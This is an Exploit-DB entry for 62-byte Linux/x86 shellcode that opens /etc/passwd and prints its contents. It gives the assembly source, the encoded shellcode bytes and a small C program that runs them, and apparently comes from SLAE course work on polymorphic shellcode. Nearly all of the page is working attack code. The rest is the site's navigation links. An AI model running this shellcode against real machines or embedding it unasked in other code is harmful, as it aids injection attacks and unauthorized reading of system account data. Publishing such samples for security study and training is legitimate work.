Linux/x86 - Read /etc/passwd Shellcode (62 bytes)

EDB-ID:

44609

CVE:

N/A

EDB Verified:

Author:

Nuno Freitas

Type:

shellcode

Exploit:   /  

Platform:

Linux_x86

Date:

2018-05-10

Vulnerable App: 
/*
; Title     : Linux/x86 - Read /etc/passwd Shellcode (62 bytes)
; Date      : May, 2018
; Author    : Nuno Freitas
; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-polymorphing-shellcodes/
; Twitter   : @nunof11
; SLAE ID   : SLAE-1112
; Size      : 62 bytes
; Tested on : i686 GNU/Linux

section .text

global _start

_start:
	xor eax, eax
	jmp two

one:
	pop ebx
	mov al, 0x5
	int 0x80
	mov esi, eax
	jmp read

exit:
	mov al, 0x1
	xor ebx, ebx
	int 0x80

read:
	mov ebx, esi
	mov al, 0x3
	mov ecx, esp
	mov dl, 0x01
	int 0x80

	xor ebx, ebx
	cmp eax, ebx
	je exit

	mov al, 0x4
	mov bl, 0x1
	int 0x80

	inc esp
	jmp read

two:
	call one
	string: db "/etc/passwd"
*/

#include <stdio.h>
#include <string.h>

unsigned char shellcode[] = \
"\x31\xc9\xf7\xe1\xeb\x28\x5b\xb0\x05\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xd8\x74\xea\xb0\x04\xb3\x01\xcd\x80\x44\xeb\xe7\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

void main()
{
	printf("Shellcode Length:  %d\n", strlen(shellcode));

	int (*ret)() = (int(*)())shellcode;
	ret();
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services